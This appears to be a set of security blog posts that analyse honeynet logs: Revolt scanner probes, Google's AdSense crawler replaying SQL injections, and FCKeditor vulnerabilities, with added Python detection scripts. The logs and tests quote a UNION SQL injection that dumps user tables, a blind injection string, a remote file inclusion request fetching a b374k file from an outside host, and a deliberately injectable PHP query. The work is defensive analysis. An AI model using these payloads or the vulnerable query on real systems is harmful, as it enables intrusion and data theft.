SUC004 : phpMyAdmin User-Agent Revolt Scanner

  • Use Case Reference : SUC004
  • Use Case Title : phpMyAdmin User-Agent Revolt Scanner
  • Use Case Detection : HTTP Logs / IDS
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : Revolt Scanner
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random port, but static source port when scan is initiated
  • Destination Port(s) : 80/TCP, 443/TCP
Possible correlation(s) :
  • phpMyAdmin scanner

Source(s) :

Surely, during your daily HTTP log check, you have already come across this kind of pattern.

...
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/mysql/sqlmanager/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/mysql/mysqlmanager/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpmyadmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpMyadmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpMyAdmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpmyAdmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpmyadmin2/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/2phpmyadmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpmy/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phppma/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/myadmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/MyAdmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/program/ HTTP/1.1" 301 - "-" "revolt"
...

These patterns are related to Revolt Scanner, a web scanner specialized in discovering phpMyAdmin installations. Once the scanner is started, the source port stays static for the whole web directory brute-force discovery. Also, this scanner only targets the IP address of the A record (IN A) of the domain it is asking for.

These scans are detected by the Emerging Threats Snort rules, more precisely SID 2009288 “WEB_SERVER Attack Tool Revolt Scanner”.

You can find here the typical list of directories that are scanned by Revolt.
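As an added example (not part of the original post), the following Python script applies the two indicators described above to Apache combined log lines: the literal “revolt” User-Agent, and a burst of HEAD requests for distinct phpMyAdmin directory names from a single source, which still fires if the User-Agent is changed. The sample log lines, the RFC 5737 documentation addresses and the 10-second / 5-directory thresholds are constructed assumptions; the directory names come from the excerpt above.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log format, as in the entries quoted in this post.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Directory names brute-forced by Revolt (the subset visible in the excerpt above).
PMA_DIRS = {"mysql/sqlmanager", "mysql/mysqlmanager", "phpmyadmin", "phpmyadmin2",
            "2phpmyadmin", "phpmy", "phppma", "myadmin", "program"}

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    r = m.groupdict()
    r["ts"] = datetime.strptime(r["ts"], "%d/%b/%Y:%H:%M:%S %z")
    # Revolt sends absolute-URI request lines; keep only the path, case-folded.
    r["path"] = re.sub(r"^https?://[^/]+", "", r["url"]).strip("/").lower()
    return r

def find_revolt_scans(lines, window_s=10, min_dirs=5):
    """Per source IP: flag the 'revolt' User-Agent and, independently, a burst of
    HEAD requests for >= min_dirs distinct phpMyAdmin directory names within window_s."""
    by_ip = defaultdict(list)
    for r in filter(None, map(parse, lines)):
        by_ip[r["ip"]].append(r)
    hits = {}
    for ip, reqs in by_ip.items():
        ua_hit = any(r["ua"].lower() == "revolt" for r in reqs)
        heads = sorted((r for r in reqs if r["method"] == "HEAD" and r["path"] in PMA_DIRS),
                       key=lambda r: r["ts"])
        burst = any(len({h["path"] for h in heads[i:]
                         if (h["ts"] - heads[i]["ts"]).total_seconds() <= window_s}) >= min_dirs
                    for i in range(len(heads)))
        if ua_hit or burst:
            hits[ip] = {"revolt_ua": ua_hit, "pma_burst": burst,
                        "dirs": sorted({h["path"] for h in heads})}
    return hits

# Constructed sample lines modelled on the excerpt above (RFC 5737 documentation addresses).
SAMPLE = """\
203.0.113.7 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://198.51.100.5:80/mysql/sqlmanager/ HTTP/1.1" 301 - "-" "revolt"
203.0.113.7 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://198.51.100.5:80/phpMyAdmin/ HTTP/1.1" 301 - "-" "revolt"
203.0.113.7 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://198.51.100.5:80/phpmyadmin2/ HTTP/1.1" 301 - "-" "revolt"
203.0.113.7 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://198.51.100.5:80/phpmy/ HTTP/1.1" 301 - "-" "revolt"
203.0.113.7 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://198.51.100.5:80/myadmin/ HTTP/1.1" 301 - "-" "revolt"
198.51.100.20 - - [23/Apr/2010:11:40:02 +0200] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""
```

Run `find_revolt_scans(SAMPLE.splitlines())` to get one entry for 203.0.113.7 with both flags set; the benign GET from the second address is not reported.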

Below you can find the latest statistics for Revolt Scanner activities.

1 Month SIG 2009288 events activities
One year SIG 2009288 events activities
1 Month TOP 10 source IPs for SIG 2009288
TOP 20 source countries for SIG 2009288

Google Mediapartners crawlers replaying web attacks

In the use case analysis SUC001, we discovered that Google Mediapartners crawlers seem to replay web attacks under certain conditions :

  • Your website needs to be a member of the AdSense network.
  • Your robots.txt file should not exclude “Mediapartners-Google” from indexing.
  • The targeted web page of your website should contain an AdSense banner.
  • The “Mediapartners-Google” crawler should visit your website frequently, ideally on every web page display.

I have created a fake MySQL database named “injection”; below you can find the fake content of this database.

CREATE TABLE IF NOT EXISTS `injection` (
  `id` int(11) NOT NULL auto_increment,
  `password` varchar(255) NOT NULL,
  PRIMARY KEY  (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=3 ;

INSERT INTO `injection` (`id`, `password`) VALUES
(1, 'testtest'),
(2, 'testtesttest');

I granted the MySQL user “injection” only SELECT on the “injection” table, restricted to this host.

After creating all the SQL requirements, we need to create a PHP test page with an “id” parameter that is vulnerable to SQL injection, for example “test2.php?id=2”.

$sql = "SELECT password FROM injection WHERE id=" . $_REQUEST['id']; // deliberately vulnerable: the request parameter is concatenated into the query unescaped

We also insert into this web page some good keywords (just copy and paste your favorite web article), and the required AdSense banner. Now that everything is configured, we can check whether the Google Mediapartners crawler will replay the SQL injection attack.

The SQL injection that will be played is the following :

SELECT password FROM injection WHERE id=2 AND ORD(MID((SELECT 4 FROM information_schema.TABLES LIMIT 0, 1), 70, 1)) > 51 AND 4454=4454

The web request produces the following entry in the Apache log file :

80.90.60.93 - - [20/Apr/2010:22:48:45 +0200] "GET //test2.php?id=2%20AND%20ORD%28MID%28%28SELECT%204%20FROM%20information_schema.TABLES%20LIMIT%200%2C%201%29%2C%2070%2C%201%29%29%20%3E%2051%20AND%204454=4454 HTTP/1.1" 200 1280 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; fr-fr) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"

The MySQL log file shows this entry :

100420 22:48:45
419 Connect     [email protected] on
1419 Init DB     injection
1419 Query       SELECT password FROM injection WHERE id=2 AND ORD(MID((SELECT 4 FROM information_schema.TABLES LIMIT 0, 1), 70, 1)) > 51 AND 4454=4454

This HTTP request is followed a few seconds later by the Google Mediapartners crawler :

66.249.71.1 - - [20/Apr/2010:22:48:48 +0200] "GET //test2.php?id=2%20AND%20ORD(MID((SELECT%204%20FROM%20information_schema.TABLES%20LIMIT%200%2C%201)%2C%2070%2C%201))%20%3E%2051%20AND%204454=4454 HTTP/1.1" 200 1280 "-" "Mediapartners-Google"

And, with no surprise, we can see in the MySQL log file that the crawler replays the SQL injection :

100420 22:48:48
1432 Connect     [email protected] on
1432 Init DB     injection
1432 Query       SELECT password FROM injection WHERE id=2 AND ORD(MID((SELECT 4 FROM information_schema.TABLES LIMIT 0, 1), 70, 1)) > 51 AND 4454=4454

So, in conclusion, if your website is a member of the Google AdSense network, displays some AdSense banners, and is vulnerable and targeted by SQL injection, you will not only be owned by the bad guys, but also by Google 🙂

SUC001 : Google Mediapartners crawlers owned ? SQL injection + RFI detected

  • Use Case Reference : SUC001
  • Use Case Title : Google Mediapartners crawlers owned ? SQL injection + RFI detected
  • Use Case Detection : HTTP Logs / Database Logs / IDS
  • Targeted Attack : N/A
  • Identified tool(s) : Google Mediapartners crawler
  • Source IP(s) : Google – 66.249.64.0/19
  • Source Countries : N/A
  • Source Port(s) : Random
  • Destination Port(s) : 80 TCP

Today, as every day, I checked the ZATAZ HoneyNet activities for the last 24 hours, and detected SQL injection attempts on one of our servers. As I am currently looking for ways to better attract SQL injection activity, I checked whether one of my tactics had produced results. Analyzing the data of the SQL injection attacks, I was surprised by the result.

The source IP of this SQL injection attempt is Google, more precisely one of the Google Mediapartners crawlers (66.249.65.12 – crawl-66-249-65-12.googlebot.com), confirmed by a whois on the IP address.

Below you can find the activity of this Google Mediapartners crawler on our HoneyNet.

Current week google crawler 66.249.65.12 activities

The count of 5 fingerprints for today is due to multiple pattern detections by the HoneyNet.

current month google crawler 66.249.65.12 activities

For the current month, this is not the only time the Google crawler was detected as a potential attack source.

Most of the time, the crawler generates a lot of IDS false positives. We have to go deeper in the investigation to determine whether these alerts are really false positives or not.

google crawler 66.249.65.12 event details

The CIDs 133304 and 131291 are real false positives generated during indexing activities.

GET /news/8176/login.html HTTP/1.1
Host: xxx.xxx.xxx
Connection: Keep-alive
Accept: */*
From: googlebot(at)googlebot.com
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept-Encoding: gzip,deflate
If-Modified-Since: Sun, 11 Apr 2010 07:58:58 GMT

All the CIDs at 2010-04-19 18:24:45 GMT+2 correspond to a single fingerprint, which is really interesting to investigate.
2010-04-19 18:24:45
GET /alerte-securite//index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,email,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users-- HTTP/1.1
Host: www.zataz.com
Connection: Keep-alive
Accept: */*
User-Agent: Mediapartners-Google
Accept-Encoding: gzip,deflate

As you can see, this is a real SQL injection attempt. You can also see that the User-Agent (Mediapartners-Google) differs from the one of the false positive CIDs.
CID 129140 is not related to an SQL injection attempt but to an RFI (Remote File Inclusion) attempt, and the User-Agent is also Mediapartners-Google.
2010-04-09 07:06:59
GET /alerte-securite/20058/MassMirror-Uploader-GLOBALS%5BMM_ROOT_DIRECTORY%5D-upload_progress.php?GLOBALS%5BMM_ROOT_DIRECTORY%5D=http://revtan.site40.net/b374k.jpg HTTP/1.1
Host: www.zataz.com
Connection: Keep-alive
Accept: */*
User-Agent: Mediapartners-Google
Accept-Encoding: gzip,deflate

Mediapartners-Google is the User-Agent of a dedicated crawler for Google AdSense, the advertisement network. This robot analyzes pages that display AdSense ads in order to target the ads to the page content. Normally, sites that do not show AdSense ads do not get visits from this crawler. The Google Mediapartners bot uses the same cache as the standard indexing bot (Googlebot).
If you only focus on these CIDs, you will not have a complete overview of how these alerts were generated. You need to investigate the timeframe (+/- 1 minute) around these alerts.
A few seconds before (“2010-04-19 18:24:40”) the Google Mediapartners crawler generated its alert, another alert was generated by the IP address “78.173.10.213”, which has exactly the same URL pattern.
2010-04-19 18:24:40

Source Address : 78.173.10.213

GET /alerte-securite//index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,email,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users-- HTTP/1.1
Host: www.zataz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.2) Gecko/20100115 Firefox/3.6 ()
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-9,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=ao791k1rtkmhqdhko9palil7r7; zatazsession_id=e356c332d8eba6d3bba2023c13cecc8a; __qca=P0-1134447578-1271694138756; __utma=163730740.1460337807.1271694138.1271694138.1271694138.1; __utmb=163730740.1.10.1271694138; __utmc=163730740; __utmz=163730740.1271694144.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=inurl%3A%27%27com_properties%27%27%20.de

We can see that after the IP address “78.173.10.213” accessed a web page containing AdSense ads, the Mediapartners-Google bot directly re-indexed the same page, replaying exactly the same query containing the SQL injection attempt.

It is clearly a false positive: Google is not targeting your website with SQL injection or RFI attack attempts. The bot is only replaying what previous attackers had attempted.

This point is interesting, because if, for example, the SQL injection was successful, the content of your database would normally be displayed in the web page. A few seconds later, the Google Mediapartners bot will replay the same SQL injection query; will it then index the database content displayed in the web page ? After some deeper investigation, it seems that yes.
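The correlation described in this post, and in the AdSense replay test above, as an added example that is not from the original posts: for each Mediapartners-Google request, look back within a window (assumed 60 seconds, matching the +/- 1 minute suggested above) for the same request from another client, comparing percent-decoded URLs because the crawler re-encodes the query (“ORD%28MID%28” in the attacker's request became “ORD(MID(” in the crawler's). The log lines are constructed after the entries quoted above, with one documentation address added.

```python
import re
from datetime import datetime
from urllib.parse import unquote_plus

# Apache combined log format, as in the entries quoted above.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    r = m.groupdict()
    r["ts"] = datetime.strptime(r["ts"], "%d/%b/%Y:%H:%M:%S %z")
    # Canonical request: percent-decode and collapse repeated slashes, so that the
    # attacker's "ORD%28MID%28" and the crawler's re-encoded "ORD(MID(" compare equal.
    r["key"] = re.sub(r"/{2,}", "/", unquote_plus(r["url"]))
    return r

def correlate_replays(lines, window_s=60, bot_ua="Mediapartners-Google"):
    """For every crawler request, find the most recent identical request from a
    non-crawler client within window_s seconds; that client is the real source."""
    reqs = sorted(filter(None, map(parse, lines)), key=lambda r: r["ts"])
    replays = []
    for i, bot in enumerate(reqs):
        if bot["ua"] != bot_ua:
            continue
        for orig in reversed(reqs[:i]):
            delay = (bot["ts"] - orig["ts"]).total_seconds()
            if delay > window_s:
                break  # older than the window: stop looking back
            if orig["ua"] != bot_ua and orig["key"] == bot["key"]:
                replays.append({"bot_ip": bot["ip"], "origin_ip": orig["ip"],
                                "delay_s": delay, "request": bot["key"]})
                break
    return replays

# Constructed log lines modelled on the entries quoted above.
SAMPLE = """\
80.90.60.93 - - [20/Apr/2010:22:48:45 +0200] "GET //test2.php?id=2%20AND%20ORD%28MID%28%28SELECT%204%20FROM%20information_schema.TABLES%20LIMIT%200%2C%201%29%2C%2070%2C%201%29%29%20%3E%2051%20AND%204454=4454 HTTP/1.1" 200 1280 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; fr-fr) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
66.249.71.1 - - [20/Apr/2010:22:48:48 +0200] "GET //test2.php?id=2%20AND%20ORD(MID((SELECT%204%20FROM%20information_schema.TABLES%20LIMIT%200%2C%201)%2C%2070%2C%201))%20%3E%2051%20AND%204454=4454 HTTP/1.1" 200 1280 "-" "Mediapartners-Google"
198.51.100.9 - - [20/Apr/2010:22:40:00 +0200] "GET /index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
66.249.71.1 - - [20/Apr/2010:22:50:00 +0200] "GET /index.php HTTP/1.1" 200 900 "-" "Mediapartners-Google"
"""
```

`correlate_replays(SAMPLE.splitlines())` reports the injection fetched by 66.249.71.1 as a replay of 80.90.60.93 three seconds earlier; the crawler's later /index.php fetch is not attributed to anyone because its only predecessor is ten minutes old.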

Vulnerabilities in FCKeditor <= 2.6.4

The SANS ISC (SANS Internet Storm Center) has issued an alert about the FCKeditor HTML editor after numerous 0day attacks were detected. These attacks particularly target websites using Adobe ColdFusion 8 (FCKeditor is a module shipped with this software).

The vendor Adobe has also issued a “potential” (sic) alert about the vulnerability in its product, and an update will be delivered, maybe, next week .... A full week, at minimum, during which many websites running ColdFusion 8 can serve as relays for attacks. Moreover, Adobe had the ingenious idea of enabling the FCKeditor ColdFusion module by default since version 8.0.1 of its software.

But what is most worrying is that all versions up to and including FCKeditor 2.6.4 are vulnerable, whether ColdFusion is used or not. Exploitation of the vulnerability is possible as soon as a connector is declared active in the “config.php” configuration file. The input sent to the “CurrentFolder” parameter of the various connector modules (see the list below) is not handled correctly, which allows listing the content of arbitrary directories or uploading files to the server. Other vulnerabilities, of the Cross Site Scripting (XSS) type, are also present, and these also work regardless of the supported language.

The vendor has provided the security update 2.6.4.1, which fixes the vulnerabilities. If the FCKeditor version is not up to date and a single connector is active in the configuration file, you can say bye bye to your server.

One may even wonder whether FCKeditor's vendor took too long to react -> look at this http://www.milw0rm.org/exploits/8060 -> whoa, it was released on 2009-02-16, hmm hmm, much ado about nothing ???

The files updated between version 2.6.4 and version 2.6.4.1 that deal with the XSS are :

_samples/asp/sample02.asp, the "Lang" variable has been protected against XSS-type attacks
_samples/asp/sample03.asp, the "Toolbar" variable has been protected against XSS-type attacks
_samples/asp/sample04.asp, the "Skin" variable has been protected against XSS-type attacks
_samples/cfm/sample02.cfm, the "Lang" variable has been protected against XSS-type attacks
_samples/cfm/sample02_mx.cfm, the "Lang" variable has been protected against XSS-type attacks
_samples/cfm/sample03.cfm, the "Toolbar" variable has been protected against XSS-type attacks
_samples/cfm/sample03_mx.cfm, the "Toolbar" variable has been protected against XSS-type attacks
_samples/cfm/sample04.cfm, the "Skin" variable has been protected against XSS-type attacks
_samples/cfm/sample04_mx.cfm, the "Skin" variable has been protected against XSS-type attacks
The XSS can execute when the variables returned by the script _samples/cfm/sampleposteddata.cfm are processed

_samples/lasso/sample02.lasso, the "Lang" variable has been protected against XSS-type attacks
_samples/lasso/sample03.lasso, the "Toolbar" variable has been protected against XSS-type attacks
_samples/lasso/sample04.lasso, the "Skin" variable has been protected against XSS-type attacks
The XSS can execute when the variables returned by the script /_samples/lasso/sampleposteddata.lasso are processed

_samples/perl/sample02.cgi, the “Lang” variable has been protected against XSS-type attacks
_samples/perl/sample03.cgi, the “Toolbar” variable has been protected against XSS-type attacks
_samples/perl/sample04.cgi, the “Skin” variable has been protected against XSS-type attacks
The XSS can execute when the variables returned by the script _samples/perl/sampleposteddata.cgi are processed

_samples/php/sample02.php, the “Lang” variable has been protected against XSS-type attacks
_samples/php/sample03.php, the “Toolbar” variable has been protected against XSS-type attacks
_samples/php/sample04.php, the “Skin” variable has been protected against XSS-type attacks
The XSS can execute when the variables returned by the script _samples/php/sampleposteddata.php are processed
The XSS can execute when the variables returned by the script sampleposteddata.py are processed

The files updated between version 2.6.4 and version 2.6.4.1 that deal with arbitrary file upload are :

editor/filemanager/connectors/asp/io.asp
editor/filemanager/connectors/asp/upload.asp

editor/filemanager/connectors/cfm/cf_io.cfm
editor/filemanager/connectors/cfm/cf_upload.cfm

editor/filemanager/connectors/lasso/upload.lasso

editor/filemanager/connectors/perl/connector.cgi
editor/filemanager/connectors/perl/io.pl
editor/filemanager/connectors/perl/upload.cgi

editor/filemanager/connectors/php/commands.php
editor/filemanager/connectors/php/io.php
editor/filemanager/connectors/php/upload.php
editor/filemanager/connectors/py/upload.py
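As an added example, neither FCKeditor's own code nor the 2.6.4.1 fix, here is a Python check a defender can run over request targets taken from a web log: it picks out requests to the connectors directory that the file list above shares across all language ports, and flags a “CurrentFolder” value that is not a plain absolute folder path. The sanity rules, the double-decoding step and the sample requests are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qs, unquote

# Every connector listed above lives under this directory, whatever the language port.
CONNECTOR_DIR = "editor/filemanager/connectors/"

def folder_is_suspicious(folder):
    """Assumed sanity rules for a folder parameter (not FCKeditor's own logic):
    an absolute, slash-terminated folder path with no traversal, backslash,
    NUL byte or drive/scheme separator. The value is decoded once more so that
    double-encoded input such as %252e%252e is caught as well."""
    f = unquote(folder)
    return (not f.startswith("/") or not f.endswith("/") or ".." in f
            or "\\" in f or "\x00" in f or ":" in f)

def check_request(request_target):
    """Classify one request target (path plus query string). Returns None for
    requests that do not touch a connector, otherwise a verdict dict."""
    url = urlsplit(request_target)
    if CONNECTOR_DIR not in url.path:
        return None
    qs = parse_qs(url.query, keep_blank_values=True)  # decodes percent-encoding once
    folder = qs.get("CurrentFolder", [None])[0]
    return {"connector": url.path, "current_folder": folder,
            "suspicious": folder is not None and folder_is_suspicious(folder)}

def scan(request_targets):
    """Return only the connector requests whose CurrentFolder fails the checks."""
    verdicts = (check_request(t) for t in request_targets)
    return [v for v in verdicts if v and v["suspicious"]]

# Constructed request targets: a benign upload, a traversal attempt,
# a double-encoded traversal attempt, and an unrelated page view.
SAMPLE = [
    "/fckeditor/editor/filemanager/connectors/php/upload.php?Type=File&CurrentFolder=/docs/",
    "/fckeditor/editor/filemanager/connectors/php/upload.php?Type=File&CurrentFolder=/docs/../../",
    "/fckeditor/editor/filemanager/connectors/asp/upload.asp?Type=Image&CurrentFolder=%252e%252e%2F",
    "/index.php?option=com_content",
]
```

`scan(SAMPLE)` returns the second and third requests; the benign upload passes and the page view is ignored.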